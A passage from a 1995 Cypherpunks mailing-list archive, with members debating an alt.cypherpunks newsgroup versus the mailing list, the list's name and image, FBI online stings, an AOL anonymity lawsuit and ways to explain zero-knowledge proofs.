net. If a few people frequented it, with the sort of diligence that a number of people spend time contributing to the alt.security.pgp group, and a useful set of pointers, and FAQs posted frequently, it might become a useful resource. One URL which I haven't seen pushed all that much which impressed me a lot for a very comprehensive list of cypherpunks technology, what it is and where to get it was Tatu Ylonen's pages on crypto, and crypto apps: http://www.cs.hut.fi/ssh/crypto/ A resource that would look good with a support newsgroup for discussion of just such technology. I would have thought that if anyone was interested to set up such a group (Peter? - your initiative?), that you could tone down the 'cypherpunks' name if you felt it would further the cause of giving the newsgroup wider appeal. I mean perhaps you would mention 'cypherpunks', 'the mailing list', near the end of the FAQ as further resources, and a forum for active discussion, explaining the name first, so that people don't get put off, after they've got that far (read all through your FAQ), presumably they'll be less inclinded to let a label bother them. Adam From banisar at epic.org Sat Sep 16 04:41:39 1995 From: banisar at epic.org (Dave Banisar) Date: Sat, 16 Sep 95 04:41:39 PDT Subject: Web page Message-ID: Hi bruce, Hows it going? I'm back from DK and the UK. I understand you're just coming back from JP (wow what world travelers we are!). have you heard from Sutherland? Do we have a title? page length? It seems to me that we should take out some of the clipper stuff and put in more on CKE since thats pretty hopt at the moment and will further distinguish us from Hoffman's book. We have also moved upto 56kb FR here in the office. Are you still interested in a home page here? Or do you have one we can link to? Dave David Banisar (Banisar at epic.org) * 202-544-9240 (tel) Electronic Privacy Information Center * 202-547-5482 (fax) 666 Pennsylvania Ave, SE, Suite 301 * ftp/gopher/wais cpsr.org Washington, DC 20003 * HTTP://epic.digicash.com/epic From JohnHemming at mkn.co.uk Sat Sep 16 04:44:57 1995 From: JohnHemming at mkn.co.uk (John Hemming CEO MarketNet) Date: Sat, 16 Sep 95 04:44:57 PDT Subject: More on ECheques Message-ID: 1. I was not suggesting that you put your real bank account number in the program. A test number is perfectly adequate. 2. In the UK people advertise their Bank Account numbers so that people can pay them. 3. If you do use your real bank account number, I will not pay you anything nonetheless. From enzo at ima.com Sat Sep 16 04:45:56 1995 From: enzo at ima.com (Enzo Michelangeli) Date: Sat, 16 Sep 95 04:45:56 PDT Subject: Quantum computing info? In-Reply-To: <199509160259.TAA03727@goblin.punk.net> Message-ID: On Fri, 15 Sep 1995, Jeff Simmons wrote: > Could anyone point me to information on 'quantum' computing? Two good starting point are: http://vesta.physics.ucla.edu/~smolin/index.html and, in Oxford: http://eve.physics.ox.ac.uk/QChome.html Enzo From jya at pipeline.com Sat Sep 16 05:19:36 1995 From: jya at pipeline.com (John Young) Date: Sat, 16 Sep 95 05:19:36 PDT Subject: HRT_web Message-ID: <199509161219.IAA04673@pipe4.nyc.pipeline.com> 9-16-95. NYPaper Page Oner: "Computer Stings Gain Favor As Arrests for Smut Increase." The F.B.I. has plans for its own web to fight computer crimes. As arrests continued in a high-tech drive against the peddling of child pornography on the nation's largest computer network, the Federal authorities said today that they expected to apply the same surveillance techniques to fight many other computer-related crimes, from consumer and securities fraud to money laundering. One way of combating these crimes, they said, will be for Federal agents to go undercover and appear as prey for unwitting criminals. Timothy McNally of the F.B.I.said that while the traditional form of surveillance included activities like waiting in cars and watching suspects for hours, "the playing field has now changed" and now requires agents to become more proficient in using computers to thwart crimes. But some civil liberties experts expressed alarm at the latest surveillance technique, saying it would have a chilling effect on what is now a freewheeling medium. HRT_web (9 kb) From dlv at bwalk.dm.com Sat Sep 16 05:30:14 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Sat, 16 Sep 95 05:30:14 PDT Subject: CYPHERPUNK considered harmful In-Reply-To: <14439.9509161026@exe.dcs.exeter.ac.uk> Message-ID: aba at dcs.exeter.ac.uk writes: > One thing I have been thinking would be nice would be a USENET > newsgroup, as mailing lists are a step away from easy access which > some people never make. This sounds like a very good idea to me, since I find the flood of e-mail from CP, much of it non-crypto-related, to be annoying. If this traffic were in a newsgroup, it would travel compressed over my phone line, and I might use a killfile on sstuff like the CO$ thread. Anything posted to the main cypherpunks mailing list and the spun-off mailing lists (steganogrpahy, remailers, nym servers, etc) could be posted to the newsgroup by maiking one of the mail2news gateways a subscriber. > time and thought to. Might I suggest that a newsgroup would be a way > to go? There are already a number of security, privacy, and crypto > related groups, but they tend to have their own pattern of flow, you > know penet.fi problems on alt.privacy.anon-server, alt.privacy (dunno > not read much), alt.security.pgp pgp usage, David Sterlight fueled > discussions, some ITAR stuff, talk.politics.crypto, crypto politics, > comp.org.eff.talk, there must be a few others. ... > Reckon cypherpunks as a group has enough readers to hmm, push through > a vote for group creation, if the majority thought it was a useful > exercise. A group soley for what? cypherpunks technology, social No vote is needed to create an alt.group: something like 'alt.security.cypherpunks' or 'alt.privacy.cypherpunks'. Just post a proposal to alt.config, post many articles seconding the proposal, let it be discussed for a week, then issue a newgroup. To create a newsgroup in the 'big 8' (comp., sci., etc) one needs to deal with unpleasant control freaks like group-advice, news.groups, and David Lawrence. It takes up to 6 months. On the other hand, many sites that have Usenet have comp.* but not alt.*. Their users would still have to use the mailing lists or find another site. To create something like comp.security.cypherpunks (I think this would be the most appropriate place, since there's already c.s.announce, c.s.misc, and c.s.firewalls), talk to the group-advice cabal. --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From rishab at dxm.org Sat Sep 16 07:12:56 1995 From: rishab at dxm.org (Rishab Aiyer Ghosh) Date: Sat, 16 Sep 95 07:12:56 PDT Subject: "Use implies consent to monitoring" Message-ID: <199509161407.HAA13837@infinity.c2.org> Rich Salz : > > Please be advised that use constitutes consent to monitoring > > Use of what? Obviously of something that can be monitored - as this is apparently from the ECPA I would assume use of "electronic communications." Of course I haven't verified that this quote is actually from the ECPA, that's what the InterNIC claims it is. ---------------------------------------------------------------------- The Indian Techonomist - newsletter on India's information industry http://dxm.org/techonomist/ rishab at dxm.org Editor and publisher: Rishab Aiyer Ghosh rishab at arbornet.org Vox +91 11 6853410; 3760335; H 34 C Saket, New Delhi 110017, INDIA From pfarrell at netcom.com Sat Sep 16 07:22:53 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Sat, 16 Sep 95 07:22:53 PDT Subject: Wash Post coverage of NIST Key escrow-export Message-ID: <199509161419.HAA23095@netcom3.netcom.com> Today's washington post has some coverage (finally) of the encryption/key-escrow/FIPS standards issues. Headline is Feuding again erupts over encryption exports I typed in the text. url: http://www.isse.gmu.edu/~pfarrell/nist/post.html Pat Pat Farrell grad student http://www.isse.gmu.edu/students/pfarrell Infor. Systems and Software Engineering, George Mason University, Fairfax, VA PGP key available via finger or request #include standard.disclaimer From unicorn at polaris.mindport.net Sat Sep 16 08:33:50 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Sat, 16 Sep 95 08:33:50 PDT Subject: Linking = Showing = Transferring? In-Reply-To: Message-ID: On Fri, 15 Sep 1995, Charles Lewton wrote: > On Fri, 15 Sep 1995, Duncan Frissell wrote: > > > > > On Thu, 14 Sep 1995, Lucky Green wrote: > > > > > The answer is trivial. If it pisses of the fascists in power enough, you > > > go to jail or get killed. > > > > > As a libertarian nut, I bow to no one in my love of extreme statements. > > But I feel compelled to sqaush this particular notion whenever I see it. > > Randy Weaver really pissed off the Feds and did not go to jail (except > > during trial) and received a $3.1 million settlement. (.1 to him, 3 to > > the kids but they are minors). > > > > DCF > > > > Not quite squashed, Duncan. Bullet placement (poor by some standards) > is all that prevented Mr. Weaver from croaking like his unfortunate wife. > She is said to have "pissed off" the feds but was not charged with a > single actionable item yet she remains quite dead. > > Unless I have missed somthing somewhere, no TLA is concerned in the slightest > with individual liberty. That notion should keep a rational person awake > nights. Much as I like the concept of checks and balances, this is an example of the evils of power balanced and checked ex post, and not ex ante. > > Chuck > From dsc at swcp.com Sat Sep 16 08:57:10 1995 From: dsc at swcp.com (Dar Scott) Date: Sat, 16 Sep 95 08:57:10 PDT Subject: (Noise) X-Files anarchist Message-ID: I hardly watch TV ...blah, blah..., but I saw X-files last night. A very minor character was a cryptohacker who--to his surprise--brute-forced a military key for some files. He was described as an anarchist. To _my_ surprise, this anarchist was not associated with violence or lunatic ravings. He was shown as reading a book entitled something like Survey of Modern Conspiracy Theories. I see this as an improvement in the stereotype of computer-associated anarchists. And this I see as a good thing, since I think there is a lot that could be learned from anarchists. I think the character was killed, but I may have missed something. Dar =========================================================== Dar Scott Home phone: +1 505 299 9497 Dar Scott Consulting Voice: +1 505 299 5790 8637 Horacio Place NE Email: darscott at aol.com Albuquerque, NM 87111 dsc at swcp.com Fax: +1 505 898 6525 http://www.swcp.com/~correspo/DSC/DarScott.html =========================================================== From unicorn at polaris.mindport.net Sat Sep 16 09:00:01 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Sat, 16 Sep 95 09:00:01 PDT Subject: CYPHERPUNK considered harmful In-Reply-To: <199509152013.QAA18005@panix.com> Message-ID: On Fri, 15 Sep 1995, David C. Lambert wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > Peter Trei wrote: > > > Terms like 'cypherpunk' and 'cryptoanarchy' tend to pigeonhole us as > > nutcases for many people, and are a barrier to getting our ideas > > across. I'm not saying this pigeonholing is correct - in fact I despise > > people who judge a book by it's cover, but so many people DO make such > > snap judgements that we need to take this into account when talking to > > the general public. > > Two of the responses to the "An opportunity..." post unapologetically > admitted that they refused to read the text of the message due to the > presence of the word "cypherpunk" in the first sentence. > > Shows you what we're up against. > > BTW, I'm not for changing the name of the list, but I do see the logic > in a more establishment-friendly name to use when lobbying the public. So found the propoganda arm of the cypherpunks with a snazzy and PC name. Distrubute watered down cypherpunk "teachings" in more benign forms which hide their true (Ohhh! Scary!) potential in an effort to make them commonly acceptable to joe sixpack. Can't we all see what road this leads down? At the risk of politicizing the issue, I wouldn't be the first to call this "left-speak" or "term-sanitizing." Really the core issue is that the citizens of their respective nations need to either: 1> See cryptography for the important individual rights issue that it is and latch on to the basic desire for free and unmonitored commerce and exchange without censorship or observation. or 2> Decide that they are not interested in the issues because these issues are too radical, or simply because their own political ideas fall left (or statist) of this spectrum. Personally, and being quite defeatist and selfish, while I would like a widespead population wide strong crypto system asthetically, in the end I don't care if every joe sixpack on the planet uses real crypto, just so long as those I am to conduct commerce (of data or goods) with do. The final judgement will be in the advantage of velocity and security of transactions and the wealth that this "allocates" to those wise enough to adopt crypto exchange systems. Evolution in action. If this makes me elitist, so be it. Granted, there are non-cryptoanarchy applications to crypto which I am ignoring. My fingers are tired and I believe them incidental. > > David C. Lambert > dcl at panix.com > (finger for PGP public key) > > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQCVAwUBMFneAqpplsfgM88VAQE+5wP9GZrIoComyFDeQ6brTLJwZ2oamry3IfC7 > XhlqMlAZnC2b1w521nm085nZKtO9/Ru9Fw3BllPinG8nGcBggr9zkH4Ba+Zbezh0 > FKK29d7wFGQz1d5JfyYCZhl4dTBdbpnU4jd5Rb27XtvP9livAeR/HIwNAJMccSCX > qO/kxlVRRZg= > =1Lxr > -----END PGP SIGNATURE----- > From aba at atlas.ex.ac.uk Sat Sep 16 09:22:27 1995 From: aba at atlas.ex.ac.uk (aba at atlas.ex.ac.uk) Date: Sat, 16 Sep 95 09:22:27 PDT Subject: CYPHERPUNK considered harmful Message-ID: <15408.9509161506@exe.dcs.exeter.ac.uk> Dimitri Vulis writes: > Anything posted to the main cypherpunks mailing list and the > spun-off mailing lists (steganogrpahy, remailers, nym servers, etc) > could be posted to the newsgroup by maiking one of the mail2news > gateways a subscriber. Not sure that would be a good idea, then the news group would *be* cypherpunks, and the cypherpunks list would have effectively become a USENET newsgroup (albiet with some mail2news stuff behind). For me part of the fun of cypherpunks is that things get discussed here which don't get discussed anywhere else, things happen here 1st, rc4 leak, that kind of thing, if it's happening crypto wise, it's on cypherpunks. You might lose some of the community feel to it if it was gated straight to a USENET group, I mean at that point the majordomo list server would have become a news2mail gateway. I was thinking more that you would have a separate newsgroup, but perhaps my feelings are more of the elitist stuff Peter was referring to, still I see no need to change a good thing, can't the two co-exist separately, Peter's stated aims didn't co-incide with my perception of the cypherpunks lists goals. ie the list (modulo cpunks write code wars) seems to me to be about people who share the common goal of free crypto for everyone, discussing how to go about this, writing code to help it happen, and analysis of what the government is up to where it infringes on cypherpunk goals. I think Peter's goals sounded more amenable to a forum which was a) easily accessible, and b) had a stated aim of a kind of cypherpunk technology transfer forum. Perhaps I am being eliteist, so shoot me, but I like cypherpunks the list the way it is! For your convenience reading cpunks there are a couple of solutions to the deluge of mail problem: there used to be a nntp server at nntp.hks.net which nntp served cypherpunks as a newsgroup (I haven't used this in a while as it appeared to be down or empty or somthing for a while), there are filters which you can set up to put all cpunks traffic in a separate mbox, and there are a couple of digest forms of cpunks around also. The filter won't help your down load time, the digest (I think Hal offers / was offering an encrypted digest which would also be compressed) and the nntp server might. > > Reckon cypherpunks as a group has enough readers to hmm, push through > > a vote for group creation, if the majority thought it was a useful > > exercise. A group soley for what? cypherpunks technology, social > > No vote is needed to create an alt.group: something like > 'alt.security.cypherpunks' or 'alt.privacy.cypherpunks'. Just post a proposal > to alt.config, post many articles seconding the proposal, let it be discussed > for a week, then issue a newgroup. Me, I quite like the cypherpunk name, I reckon it would be best from a distribution pov to get a big8 group, as you discuss. > To create a newsgroup in the 'big 8' (comp., sci., etc) one needs to > deal with unpleasant control freaks like group-advice, news.groups, > and David Lawrence. It takes up to 6 months. On the other hand, > many sites that have Usenet have comp.* but not alt.*. Their users > would still have to use the mailing lists or find another site. To > create something like comp.security.cypherpunks (I think this would > be the most appropriate place, since there's already c.s.announce, > c.s.misc, and c.s.firewalls), talk to the group-advice cabal. I'll let other people argue about newsgroups names. Adam From unicorn at polaris.mindport.net Sat Sep 16 09:31:09 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Sat, 16 Sep 95 09:31:09 PDT Subject: CYPHERPUNK considered harmful. In-Reply-To: <9509151915.AA16093@toad.com> Message-ID: On Fri, 15 Sep 1995, Peter Trei wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > Think about it. Which future would you rather see: > > 1. Lots of people demanding strong unescrowed crypto for what you > consider rather peripheral and politically unaware reasons, which > you have educated them in. > > 2. Unescrowed crypto banned, with those who promote considered > aiders and abeters of the four horsemen, (but boy are they > ideologically pure!). 3. Unescrowed crypto banned, with advanced stego, panic passwords, stealth PGP, incorporated remailers all across international borders making offenders impossible to identify or catch. Given the degree to which I believe 1. unlikely in the numbers required to avoid the unescrowed encryption ban, I believe the goal is to propogate crypto far enough to at least have a salient "underground" participants. Some months ago I called for advanced stego and stealth PGP as well as larger keys in the event we all had to go "into the crypto closet" for a time. I call for them again. > > Peter Trei > > I probably won't see any responses till Monday. I'm going for a > weekend at a resort on Lake Winnipesaukee. If you need me, I'll be > in the hot tub. :-) > > > > > > > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQCVAwUBMFmmK1QxhKXe9s8VAQE+tgP+NcKdGvBeJpa8AHGr/RhKCHudZP2qmRNP > J699UCCvN006ywIjurjuis48VPj26uxBkcRbeuzNxGlKmZqXIkS0vEcFjrrZhBsK > V9dLFFGTZ6JG3nK++mleW1wQB/F0azXXvXKJWa6R+Tnj1oo2ADUxGNQMs9IVmgR3 > zsyK3fej+IQ= > =YqDH > -----END PGP SIGNATURE----- > > Peter Trei > Senior Software Engineer > Purveyor Development Team > Process Software Corporation > http://www.process.com > trei at process.com > From tcmay at got.net Sat Sep 16 09:34:31 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 16 Sep 95 09:34:31 PDT Subject: "alt.cypherpunks" Newsgroup vs. Mailing List? Message-ID: Should there be an "alt.cypherpunks" type of newsgroup instead of this mailing list? (Or, to use my punchline at the end: Let the market decide.) At 10:26 AM 9/16/95, aba at atlas.ex.ac.uk wrote: >One thing I have been thinking would be nice would be a USENET >newsgroup, as mailing lists are a step away from easy access which >some people never make. It makes it less easy to browse and see what >it's about, interacting with majordomo software might seem very >intuitive to most members, but not all will be so comfortable signing >up their mailbox (which they possibly pay for per K), and may indeed >lack the expertise required to do the job. There are serveral >archives of cpunks, but these don't tend to be as well known as >newsgroups. More people might come across cypherpunks ideas, and the >technology for remailers, disk encryptors, discussions of nym servers, >steganorgraphy, IPSEC, etc if they were in a newsgroup, perhaps even >within the comp, soc, or sci hierarchies. It would be easy to create "alt.cypherpunks." I've been expecting to see it happen for the last 3 years. It could still happen. In fact, there's been talk of doing it (sorry for the passive "there has been talk," but I'll let the folks talking about doing it do the talking about it here). "Alt" groups are easy to create. (Newcomers to the list might like to know that one of our founding memmbers, John Gilmore, created the "alt.*" option some years back, with "alt.drugs" I think it was.) However, how many _newsgroups_ do any of you know of that have anywhere near the sense of cohesion and "community" that our mailing list has? Newsgroups encourage wider exposure to ideas, but also make "hit-and-run" disruptions more likely. The speed bump of having to figure out how to subscribe to a mailing list, and the expectation that one will remain "in the community" for a while, moderates flamish behavior and encourages people to try to learn. Newsgroups encourage very wide browsing, which has some advantages. But also a lack of persistent contributors and a lack of community. Mailing lists _tend_ to have much tighter feedback loops, where most messages are read by most members, or at least are glanced at. Newsgroups have a different character, and topics get repeated even more often. Interestingly, several crypto folks I know have said they have stopped seriously using the "sci.crypt" and "talk.politics.crypto" newsgroups and are concentrating on smaller mailing lists of co-workers and committee members(task forces, working groups, etc.). In some sense, the Cypherpunks list is somewhere in-between a full newsgroup and a small working mailing list. I could go on, but I ask instead that readers do their own investigation. First, are there any newsgroups out there that have the atmosphere we have? (I'm not saying there aren't any, and finding some examples to look at might be instructive...) Second, would the benefits of wider exposure, as "alt.cypherpunks," more than balance out the negative effects mentioned above? Third, is "news reading" software really that much better than "mail reading" software? For me, for example, I use Eudora Pro and can filter all messages by words in the thread name, by author, by mailing list name, etc. And _saving_ messages is the default, unlike newsgroups, where I must explicitly save an article to a file. So, for me, I have a very large "Cypherpunks archives," whereas I don't have a large "talk.polititics.crypto" archive (partly because of the lack of community there....). This brings up a final point, with more than 10,000 newsgroups, including nearly a dozen devoted to crypto, PGP, security, and anonymity, aren't there already enough? A likely effect of "alt.cypherpunks" is this: Subject: Re: ITARs Worked for Less than One Day Date: Sun, 10 Sep 1995 00:18:38 GMT From: david at sternlight.com (David Sternlight) Organization: DSI/USCRPAC Newsgroups: sci.crypt, alt.security.pgp, talk.politics.crypto, alt.cypherpunks That is, "alt.cypherpunks" just gets added to the cc: list of a lot of posts. But, if anyone wants it, create it. Then people can vote with their feet. Both the list and the newsgroup can co-exist, and if the newsgroup "wins," the list can be dropped. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From unicorn at polaris.mindport.net Sat Sep 16 09:35:48 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Sat, 16 Sep 95 09:35:48 PDT Subject: More on ECheques In-Reply-To: Message-ID: On Sat, 16 Sep 1995, John Hemming CEO MarketNet wrote: > 1. I was not suggesting that you put your real bank account number > in the program. A test number is perfectly adequate. > > 2. In the UK people advertise their Bank Account numbers so that people > can pay them. > > 3. If you do use your real bank account number, I will not pay you > anything nonetheless. (But I will clone some checks and drain your account quickly). From unicorn at polaris.mindport.net Sat Sep 16 09:39:41 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Sat, 16 Sep 95 09:39:41 PDT Subject: (Noise) X-Files anarchist In-Reply-To: Message-ID: On Sat, 16 Sep 1995, Dar Scott wrote: > I hardly watch TV ...blah, blah..., but I saw X-files last night. A very > minor character was a cryptohacker who--to his surprise--brute-forced a > military key for some files. He was described as an anarchist. > > To _my_ surprise, this anarchist was not associated with violence or > lunatic ravings. He was shown as reading a book entitled something like > Survey of Modern Conspiracy Theories. "50 Greatest Conspiracies" But I never watch T.V. > > I think the character was killed, but I may have missed something. > > Dar > > =========================================================== > Dar Scott Home phone: +1 505 299 9497 > > Dar Scott Consulting Voice: +1 505 299 5790 > 8637 Horacio Place NE Email: darscott at aol.com > Albuquerque, NM 87111 dsc at swcp.com > Fax: +1 505 898 6525 > http://www.swcp.com/~correspo/DSC/DarScott.html > =========================================================== > > > From tcmay at got.net Sat Sep 16 09:50:13 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 16 Sep 95 09:50:13 PDT Subject: Explaining Zero Knowledge to your children Message-ID: At 3:10 AM 9/15/95, hallam at w3.org wrote: >The cave analogy sucks. > >The way I tried to explain Zero Knowledge is this: > > >Imagine that you have a duplicator device which you want to sell, you don't >want to explain why it works to the buyer however since then they would >just make their own (patents have been abolished by this time). You also don't >want the buyer to be able to prove to anyone else that you have a duplicator. > >So what you do is you play the "what hand is it in game" and you do this >with a >10$ bill provided by the buyer and who records its serial number. You hold the >original article in one hand and the duplicate in the other. The buyer choses >one hand, you show the article in that hand. The buyer knows you had a 50:50 >chance of a lucky guess so you do it again, each time the probability of >getting >it right by a lucky guess halves. After 10 tries or so it is virtually certain >that you were not faking. > > >Any better ideas... Clever, but I think it's missing an important element of zero knowledge interactive proof systems. For example, why not simply open _both_ hands? By opening both hands one shows immediately that one has a duplicator, but does not show how the duplicator works. The same results are obtained with perfect certainty in _one_ round that the ZKIPS approach takes N rounds (as N gets large). Granted, this fails the " don't want the buyer to be able to prove to anyone else that you have a duplicator" test, but I don't think that is central to ZKIPS. I think a more important test is "don't show others how to make matter duplicators." Matter duplicators are "self-demonstrating" without revealing how they work, so they don't fit the model of (or create a need for) software-based ZKIPS. For example, in the Hamiltonian cycle example, the Prover demonstrates to the Skeptic either the set of nodes, with the nodes labelled, or a Hamiltonian cycle, with the nodes unlabelled. If he shows _both_ the set of nodes _and_ a Hamiltonian cycle, then he's given the Skeptic the whole shebang. In Phill's example, he's just taught the Skeptic "how to make a matter duplicator." But I applaud the creation of new and simpler examples, and maybe I'm wrong and Phill's example captures the essence of zero knowledge interactive proofs. I'll think about it some more. Comments? --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From hroller at c2.org Sat Sep 16 09:53:30 1995 From: hroller at c2.org (hroller Mixmaster) Date: Sat, 16 Sep 95 09:53:30 PDT Subject: Arnold Bowker and John Joslin vs. Privacy Message-ID: <199509161647.JAA23365@infinity.c2.org> "Case Could End Anonymity of Computer Network Users" by Brian Bergstein (Associated Press) Anonymity and freedom of speech in cyberspace are being challenged by a Caribbean resort owner in a court case that could dramatically restrict the rights of computer network users. The resort owner and scuba instructor claim that they were defamed on a computer bulletin board by an anonymous user, and they asked a judge this week to force America Online to reveal the name of the subscriber so they can sue the person for libel. If Arnold Bowker and John Joslin are successful in obtaining the name, it could have serious implications for millions of people who use the Internet to think, write and debate in a world where they are identified by their ideas, not their names. Technology experts fear a morass of court cases that would hold computer users accountable for what they say anonymously. "What this case brings up is the specter of millions of libel suits every time there's a disagreement on the Internet," said Daniel Weitzner of the Center for Democracy and Technology in Washington. "I think it's a critical issue." Several calls seeking comment from officials at America Online were not immediately returned Friday. Abraham Haddad, chairman of the computer science department at Northwestern University, said the anonymity of cyberspace should be maintained as long as it was not being used to commit a crime. "There's really a need to protect people's privacy as long as no laws have been broken," Haddad said. From ravage at einstein.ssz.com Sat Sep 16 09:57:15 1995 From: ravage at einstein.ssz.com (Jim Choate) Date: Sat, 16 Sep 95 09:57:15 PDT Subject: alt.cypherpunks Message-ID: <199509161706.MAA03037@einstein.ssz.com> Hi all, My vote is to let the folks on usenet sink in their own quagmire of ignorance about what we do. This list is no secret. If somebody wants to get into the 'game' let them bloody well subscribe. Ta ta. Jim Choate CyberTects ravage at einstein.ssz.com From tcmay at got.net Sat Sep 16 09:58:18 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 16 Sep 95 09:58:18 PDT Subject: (Noise) X-Files anarchist Message-ID: At 3:56 PM 9/16/95, Dar Scott wrote: >I hardly watch TV ...blah, blah..., but I saw X-files last night. A very >minor character was a cryptohacker who--to his surprise--brute-forced a >military key for some files. He was described as an anarchist. > >To _my_ surprise, this anarchist was not associated with violence or >lunatic ravings. He was shown as reading a book entitled something like >Survey of Modern Conspiracy Theories. I see this as an improvement in the >stereotype of computer-associated anarchists. And this I see as a good >thing, since I think there is a lot that could be learned from anarchists. Vince Foster was technical advisor to "The X-Files." The NSA had him killed at Fort Darcy because he was getting too close to the Bilderbergers and their control of the secret UFO technology first given to the Nazis and then transferred to Winnemucca, Nevada as part of Operation Paperclip. The pilot who flew Bush in an SR-71 to negotiate with the Iranians to delay the release of the hostages and so defeat Carter in 1980 is also the author of "Nomenclature of a Conspiracy Cabal," one of the books shown in that episode. President Clinton, at the Underground White House near Edwards Air Force Base, OKed the hit on Foster, even though "The X-Files" was one of his favorite shows. The Greys must be appeased. --Klaus! von Future Prime, who actually has several dozen books on these and similar subjects From nobody at alpha.c2.org Sat Sep 16 10:05:30 1995 From: nobody at alpha.c2.org (Anonymous) Date: Sat, 16 Sep 95 10:05:30 PDT Subject: SPAM bait In-Reply-To: <9509152041.AA21715@argosy.MasPar.COM> Message-ID: <199509161700.KAA24077@infinity.c2.org> David G. Koontz (koontz at MasPar.COM) wrote: : To: janet.dove at ledip.py : Subject: Re: ===>> FREE 1 yr. Magazine Sub sent worldwide- 315+ Popular USA Tit Don't worry, "Janet Dove", or actually sanghi3 at grfn.org got mailbombed severely for this one. I'm just glad he doesn't know how to use remailers. From tcmay at got.net Sat Sep 16 10:18:54 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 16 Sep 95 10:18:54 PDT Subject: Digital Fingerprinting Message-ID: At 6:57 AM 9/16/95, Alan Olsen wrote: >I seem to remember a software piracy case from a number of years back. The >case was settled by Apple showing that their code had been copied by the >copyright "easteregg" hidden in the roms. Made for a quick and effective >demonstration in court. (The story may be apocryphal, but it makes for an >example as to how such things do have a (supposed) valid use in protecting >code from being snagged by other companies.) And someone just cited the same (or very similar) example, where the "quick and effective demonstration" nevertheless resulted (they said) in an acquittal. So, which way did it go? --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From hallam at w3.org Sat Sep 16 10:34:22 1995 From: hallam at w3.org (hallam at w3.org) Date: Sat, 16 Sep 95 10:34:22 PDT Subject: "alt.cypherpunks" Newsgroup vs. Mailing List? In-Reply-To: Message-ID: <9509161733.AA03680@zorch.w3.org> >Should there be an "alt.cypherpunks" type of newsgroup instead of this >mailing list? Bad idea, it would simply mean that every kook on USEnet would add alt.cypherpunks onto the crossposting line. We would have black helicopters, gun loons, Waco Wako's, Loonytarians and turkish government propaganda spamming forever. I think we should wait a while. I see USEnet going through some very dramatic changes quite soon, the infrastructure of newsgroups is now insufficient to support the cognitive complexity of discorse amongst so many people. I expect more structures discorse models such as the lightweight link semantics of Openmeeting and Wit to percolate in, NCSA already have a version of hypernews with these features. One thought to ponder on. There is no real difference in terms of resources required between a mailing list and an archive of a mailing list at a Web site. The latter does avoid a large number of unnecessary dispatches however. Phill Phill From mark at unicorn.com Sat Sep 16 10:53:11 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Sat, 16 Sep 95 10:53:11 PDT Subject: "alt.cypherpunks" Newsgroup vs. Mailing List? Message-ID: On Sat, 16 Sep 1995 hallam at w3.org wrote: > One thought to ponder on. There is no real difference in terms of resources > required between a mailing list and an archive of a mailing list at a Web > site. The latter does avoid a large number of unnecessary dispatches however. However: a) You can't read it through a remailer (yet). b) Anyone watching the site can tell which threads you're interested in, and thereby determine what your real interests in this group are. c) It cuts off anyone who doesn't have direct net access, or can't afford long telephone calls. It's a lot cheaper to download a day's mail in one go than to spend three hours browsing a WWW site. Mark From dmandl at panix.com Sat Sep 16 11:01:54 1995 From: dmandl at panix.com (David Mandl) Date: Sat, 16 Sep 95 11:01:54 PDT Subject: "alt.cypherpunks" Newsgroup vs. Mailing List? Message-ID: At 1:33 PM 9/16/95, hallam at w3.org wrote: >>Should there be an "alt.cypherpunks" type of newsgroup instead of this >>mailing list? > >Bad idea, it would simply mean that every kook on USEnet would add >alt.cypherpunks onto the crossposting line. We would have black >helicopters, gun >loons, Waco Wako's, Loonytarians and turkish government propaganda spamming >forever. A lot of people on the list seem to see it as a corporation that has to show X% growth for its shareholders every year. The list is a healthy size, and there are a lot of very bright people on it with very good ideas (a lot of the best people and best ideas in the field, in fact). Traffic is pretty high, too. I don't see any reason to try to increase our market share just for the sake of it. Even worse, it seems to me that what some people are suggesting (and this comes up at least once a year) will lead to increased entropy, with us, the EFF, EPIC, etc., etc., blending into one amorphous lobbying blob. This is a unique list of people doing VERY IMPORTANT work that no one else is doing. To tell you the truth, I think that to date cypherpunks have left a much greater mark on the world than the EFF and all of the others. No question about it. Again (as others have said over and over), if people are concerned about better lobbying, this isn't the place for it--and the good news for you is that there are plenty of other groups with the resources, staff, and mission to do it. So what's the problem? If you're embarrassed mentioning our name to your straight friends, c'est la vie. I wish I could show my boss my brilliant article in the new issue of ANARCHY, but I can't. --Dave. -- Dave Mandl dmandl at panix.com http://wfmu.org/~davem From dl at hplyot.obspm.fr Sat Sep 16 11:20:08 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Sat, 16 Sep 95 11:20:08 PDT Subject: [NOISE] Re: Linking = Showing = Transferring? In-Reply-To: Message-ID: <9509161819.AA08057@hplyot.obspm.fr> Alan Barrett writes: > > I wonder if I have a pornopage. > Of course you do 